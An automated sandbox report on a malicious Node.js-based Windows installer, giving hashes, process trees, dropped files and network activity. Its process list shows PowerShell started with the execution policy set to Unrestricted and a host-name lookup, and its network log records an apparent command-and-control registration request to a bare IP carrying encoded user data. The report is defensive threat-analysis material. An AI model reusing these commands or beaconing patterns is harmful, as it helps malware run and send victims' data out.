File name: 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe

Full analysis: https://app.any.run/tasks/ddfa821b-5851-4ade-8a3c-df5ee888eca3
Verdict: Malicious activity
Analysis date: December 13, 2024, 19:28:51
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: nodejs
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive, 5 sections
MD5: 297D5CE4DCBAE459987DE91D17DCB9A8
SHA1: 643E5C9F4D04D42375B344B00550BC7ED4D119E6
SHA256: 155D357DEAC165E8EB2750FC63D2BCF34E90095B61772BFF1C20D22435B2262B
SSDEEP: 786432:DgqoMmxuOvaMAZzseQE00KBRXG5Cs4Qnyg:DDoMKuOvaMAZzsmaXG5Cs4Qnv

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executing a file with an untrusted certificate

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)
    • Changes powershell execution policy (Unrestricted)

      • PleasureHipness Inc.exe (PID: 5540)
  • SUSPICIOUS

    • Malware-specific behavior (creating "System.dll" in Temp)

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)
    • Executable content was dropped or overwritten

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)
    • The process creates files with name similar to system file names

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)
    • Drops 7-zip archiver for unpacking

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)
    • Reads security settings of Internet Explorer

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)
    • Process drops legitimate windows executable

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)
    • Starts application with an unusual extension

      • cmd.exe (PID: 4528)
    • Application launched itself

      • PleasureHipness Inc.exe (PID: 5540)
    • Starts CMD.EXE for commands execution

      • PleasureHipness Inc.exe (PID: 5540)
    • The process hides Powershell's copyright startup banner

      • PleasureHipness Inc.exe (PID: 5540)
    • Starts POWERSHELL.EXE for commands execution

      • PleasureHipness Inc.exe (PID: 5540)
    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 4228)
    • The process bypasses the loading of PowerShell profile settings

      • PleasureHipness Inc.exe (PID: 5540)
    • Connects to the server without a host name

      • PleasureHipness Inc.exe (PID: 5540)
  • INFO

    • Checks supported languages

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)
      • PleasureHipness Inc.exe (PID: 5540)
      • PleasureHipness Inc.exe (PID: 5736)
      • chcp.com (PID: 3612)
      • PleasureHipness Inc.exe (PID: 2736)
    • Reads the computer name

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)
      • PleasureHipness Inc.exe (PID: 5540)
      • PleasureHipness Inc.exe (PID: 2736)
      • PleasureHipness Inc.exe (PID: 5736)
    • Create files in a temporary directory

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)
    • The sample compiled with english language support

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)
    • Changes the display of characters in the console

      • cmd.exe (PID: 4528)
    • Checks proxy server information

      • PleasureHipness Inc.exe (PID: 5540)
    • Reads the machine GUID from the registry

      • PleasureHipness Inc.exe (PID: 5540)
    • Node.js compiler has been detected

      • PleasureHipness Inc.exe (PID: 5540)
      • PleasureHipness Inc.exe (PID: 2736)
      • PleasureHipness Inc.exe (PID: 5736)
    • The process uses the downloaded file

      • powershell.exe (PID: 5972)
      • powershell.exe (PID: 2084)
      • powershell.exe (PID: 5556)
      • powershell.exe (PID: 4672)
      • powershell.exe (PID: 5892)
      • powershell.exe (PID: 6416)
      • powershell.exe (PID: 6988)
      • powershell.exe (PID: 4992)
      • powershell.exe (PID: 5032)
      • powershell.exe (PID: 5564)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5972)
      • powershell.exe (PID: 6936)
      • powershell.exe (PID: 5564)
      • powershell.exe (PID: 7008)
    • Sends debugging messages

      • PleasureHipness Inc.exe (PID: 5540)
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

ProductVersion: 6.9.6
ProductName: PleasureHipness Inc
LegalTrademarks: PleasureHipness
LegalCopyright: Copyright © 2024 PleasureHipness Inc
FileVersion: 4.6.3
FileDescription: -
CharacterSet: Windows, Latin1
LanguageCode: English (U.S.)
FileSubtype: -
ObjectFileType: Executable application
FileOS: Win32
FileFlags: (none)
FileFlagsMask: 0x0000
ProductVersionNumber: 6.9.6.0
FileVersionNumber: 6.9.6.0
Subsystem: Windows GUI
SubsystemVersion: 4
ImageVersion: 6
OSVersion: 4
EntryPoint: 0x338f
UninitializedDataSize: 16384
InitializedDataSize: 473088
CodeSize: 26624
LinkerVersion: 6
PEType: PE32
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
TimeStamp: 2018:12:15 22:26:14+00:00
MachineType: Intel 386 or later, and compatibles
Total processes: 162
Monitored processes: 54
Malicious processes: 2
Suspicious processes: 0

Behavior graph

[Behavior graph. Processes shown: 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe, pleasurehipness inc.exe (three instances), cmd.exe, chcp.com, findstr.exe, and numerous powershell.exe and conhost.exe processes.]

Process information

PID
CMD
Path
Indicators
Parent process
PID: 5592
CMD: "C:\Users\admin\Desktop\643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe"
Path: C:\Users\admin\Desktop\643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe
Parent process: explorer.exe
User: admin
Integrity Level: MEDIUM
Exit code: 134
Version: 4.6.3
PID: 5540
CMD: "C:\Users\admin\AppData\Local\Temp\2q4lrrU9xmobPxyZ5U2SfO6o7kS\PleasureHipness Inc.exe"
Path: C:\Users\admin\AppData\Local\Temp\2q4lrrU9xmobPxyZ5U2SfO6o7kS\PleasureHipness Inc.exe
Parent process: 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe
User: admin
Company: GitHub, Inc.
Integrity Level: MEDIUM
Description: PleasureHipness Inc
Exit code: 134
Version: 4.6.3
PID: 4528
CMD: C:\WINDOWS\system32\cmd.exe /d /s /c "chcp"
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: PleasureHipness Inc.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.3636 (WinBuild.160101.0800)
PID: 5544
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 3612
CMD: chcp
Path: C:\Windows\SysWOW64\chcp.com
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Change CodePage Utility
Exit code: 0
Version: 10.0.19041.3636 (WinBuild.160101.0800)
PID: 5736
CMD: "C:\Users\admin\AppData\Local\Temp\2q4lrrU9xmobPxyZ5U2SfO6o7kS\PleasureHipness Inc.exe" --type=gpu-process --user-data-dir="C:\Users\admin\AppData\Roaming\boyyyhdgbntaxqtj" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1912 --field-trial-handle=1916,i,6418311846873358346,16920656953182970438,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Path: C:\Users\admin\AppData\Local\Temp\2q4lrrU9xmobPxyZ5U2SfO6o7kS\PleasureHipness Inc.exe
Parent process: PleasureHipness Inc.exe
User: admin
Company: GitHub, Inc.
Integrity Level: LOW
Description: PleasureHipness Inc
Exit code: 0
Version: 4.6.3
PID: 2736
CMD: "C:\Users\admin\AppData\Local\Temp\2q4lrrU9xmobPxyZ5U2SfO6o7kS\PleasureHipness Inc.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\admin\AppData\Roaming\boyyyhdgbntaxqtj" --mojo-platform-channel-handle=2200 --field-trial-handle=1916,i,6418311846873358346,16920656953182970438,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Path: C:\Users\admin\AppData\Local\Temp\2q4lrrU9xmobPxyZ5U2SfO6o7kS\PleasureHipness Inc.exe
Parent process: PleasureHipness Inc.exe
User: admin
Company: GitHub, Inc.
Integrity Level: MEDIUM
Description: PleasureHipness Inc
Exit code: 0
Version: 4.6.3
PID: 4876
CMD: C:\WINDOWS\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: PleasureHipness Inc.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.3636 (WinBuild.160101.0800)
PID: 5032
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 5556
CMD: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: PleasureHipness Inc.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Total events: 104 526
Read events: 104 526
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 17
Suspicious files: 123
Text files: 68
Unknown types: 0

Dropped files

PID: 5592
Process: 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe
Filename: C:\Users\admin\AppData\Local\Temp\nst396E.tmp\app-32.7z
MD5:
SHA256:

PID: 5592
Process: 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe
Filename: C:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\icudtl.dat
MD5:
SHA256:

PID: 5592
Process: 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe
Filename: C:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\LICENSES.chromium.html
MD5:
SHA256:

PID: 5592
Process: 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe
Filename: C:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\locales\am.pak
Type: pgc
MD5: 2009647C3E7AED2C4C6577EE4C546E19
SHA256: 6D61E5189438F3728F082AD6F694060D7EE8E571DF71240DFD5B77045A62954E

PID: 5592
Process: 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe
Filename: C:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\chrome_100_percent.pak
Type: binary
MD5: ACD0FA0A90B43CD1C87A55A991B4FAC3
SHA256: CCBCA246B9A93FA8D4F01A01345E7537511C590E4A8EFD5777B1596D10923B4B

PID: 5592
Process: 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe
Filename: C:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\chrome_200_percent.pak
Type: binary
MD5: 4610337E3332B7E65B73A6EA738B47DF
SHA256: C91ABF556E55C29D1EA9F560BB17CC3489CB67A5D0C7A22B58485F5F2FBCF25C

PID: 5592
Process: 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe
Filename: C:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\locales\da.pak
Type: pgc
MD5: 1A53D374B9C37F795A462AAC7A3F118F
SHA256: D0C38EB889EE27D81183A0535762D8EF314F0FDEB90CCCA9176A0CE9AB09B820

PID: 5592
Process: 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe
Filename: C:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\locales\en-US.pak
Type: binary
MD5: 5E3813E616A101E4A169B05F40879A62
SHA256: 4D207C5C202C19C4DACA3FDDB2AE4F747F943A8FAF86A947EEF580E2F2AEE687

PID: 5592
Process: 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe
Filename: C:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\locales\ar.pak
Type: binary
MD5: 47A6D10B4112509852D4794229C0A03B
SHA256: 857FE3AB766B60A8D82B7B6043137E3A7D9F5CFB8DDD942316452838C67D0495

PID: 5592
Process: 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe
Filename: C:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\locales\af.pak
Type: pgc
MD5: 7E51349EDC7E6AED122BFA00970FAB80
SHA256: F528E698B164283872F76DF2233A47D7D41E1ABA980CE39F6B078E577FD14C97
HTTP(S) requests: 8
TCP/UDP connections: 25
DNS requests: 7
Threats: 0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5540
PleasureHipness Inc.exe
GET
200
79.133.46.35:80
http://79.133.46.35/call.php?api=register&username=dXNlcg==&userdata=[...]
unknown
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
142.250.184.196:443
https://www.google.com/
unknown
html
18.3 Kb
whitelisted

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
2.23.209.161:443
www.bing.com
Akamai International B.V.
GB
whitelisted
192.168.100.255:138
whitelisted
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5540
PleasureHipness Inc.exe
142.250.184.196:443
www.google.com
GOOGLE
US
whitelisted
5540
PleasureHipness Inc.exe
79.133.46.35:80
diva-e Datacenters GmbH
DE
unknown

DNS requests

Domain
IP
Reputation
www.bing.com
  • 2.23.209.161
  • 2.23.209.177
  • 2.23.209.182
  • 2.23.209.189
  • 2.23.209.150
  • 2.23.209.158
  • 2.23.209.176
  • 2.23.209.187
  • 2.23.209.179
whitelisted
google.com
  • 172.217.18.110
whitelisted
crl.microsoft.com
  • 2.16.241.12
  • 2.16.241.19
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
www.google.com
  • 142.250.184.196
whitelisted
self.events.data.microsoft.com
  • 51.105.71.136
whitelisted

Threats

No threats detected
Process
Message
PleasureHipness Inc.exe
<--- Last few GCs ---> [5540:5B104000] 41071 ms: Mark-Compact 1001.8 (1043.1) -> 1001.1 (1043.1) MB, 2547.00 / 0.00 ms (average mu = 0.222, current mu = 0.018) allocation failure; scavenge might not succeed [5540:5B104000] 43711 ms: Mark-Compact 1008.9 (1043.1) -> 1008.2 (1058.1) MB, 2641.00 / 0.00 ms (average mu = 0.110, current mu = 0.000) allocation failure; scavenge might not succeed
PleasureHipness Inc.exe
<--- JS stacktrace --->